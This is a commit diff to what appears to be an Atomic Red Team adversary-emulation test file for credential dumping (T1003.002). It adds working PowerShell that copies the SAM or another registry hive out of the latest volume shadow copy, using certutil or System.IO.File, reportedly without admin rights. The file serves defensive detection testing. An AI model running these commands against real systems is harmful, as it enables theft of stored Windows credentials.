Update T1003.002.yaml (#1595)
Added test 6 to dump hives with System.IO.File. Also tweaked test 5 so that the hive could be selected by the user, same as in test 6
This commit is contained in:
Brandon Morgan
@@ -99,19 +99,23 @@ atomic_tests:
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
|
||||
- name: dump volume shadow copy hive with certutil
|
||||
- name: dump volume shadow copy hives with certutil
|
||||
auto_generated_guid: eeb9751a-d598-42d3-b11c-c122d9c3f6c7
|
||||
description: |
|
||||
Dump the SAM hive from volume shadow copies with the certutil utility
|
||||
Dump hives from volume shadow copies with the certutil utility
|
||||
This can be done with a non-admin user account
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
file_path:
|
||||
dump_path:
|
||||
description: Path where the hive will be dumped
|
||||
type: Path
|
||||
default: $ENV:temp
|
||||
file_name:
|
||||
target_hive:
|
||||
description: Hive you wish to dump
|
||||
type: String
|
||||
default: SAM
|
||||
dumped_hive:
|
||||
description: Name of the dumped hive
|
||||
type: String
|
||||
default: myhive
|
||||
@@ -121,11 +125,45 @@ atomic_tests:
|
||||
$shadowlist = get-wmiobject win32_shadowcopy
|
||||
$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
|
||||
$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
|
||||
$shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\SYSTEM"
|
||||
certutil -f -v -encodehex $shadowpath #{file_path}\#{file_name} 2
|
||||
$shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}"
|
||||
certutil -f -v -encodehex $shadowpath #{dump_path}\#{dumped_hive} 2
|
||||
name: powershell
|
||||
elevation_required: false
|
||||
cleanup_command: |
|
||||
write-host ""
|
||||
$toremove = #{file_path} + "\" + '#{file_name}'
|
||||
$toremove = #{dump_path} + "\" + '#{dumped_hive}'
|
||||
rm $toremove
|
||||
|
||||
- name: dump volume shadow copy hives with System.IO.File
|
||||
description: |
|
||||
Dump hives from volume shadow copies with System.IO.File
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
dump_path:
|
||||
description: Path where the hive will be dumped
|
||||
type: Path
|
||||
default: $ENV:temp
|
||||
target_hive:
|
||||
description: Hive you wish to dump
|
||||
type: String
|
||||
default: SAM
|
||||
dumped_hive:
|
||||
description: Name of the dumped hive
|
||||
type: String
|
||||
default: myhive
|
||||
executor:
|
||||
command: |
|
||||
write-host ""
|
||||
$shadowlist = get-wmiobject win32_shadowcopy
|
||||
$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
|
||||
$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
|
||||
$shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}"
|
||||
$mydump = #{dump_path} + '\' + '#{dumped_hive}'
|
||||
[System.IO.File]::Copy($shadowpath , $mydump)
|
||||
name: powershell
|
||||
elevation_required: false
|
||||
cleanup_command: |
|
||||
write-host ""
|
||||
$toremove = #{dump_path} + "\" + '#{dumped_hive}'
|
||||
rm $toremove
|
||||
Reference in New Issue
Block a user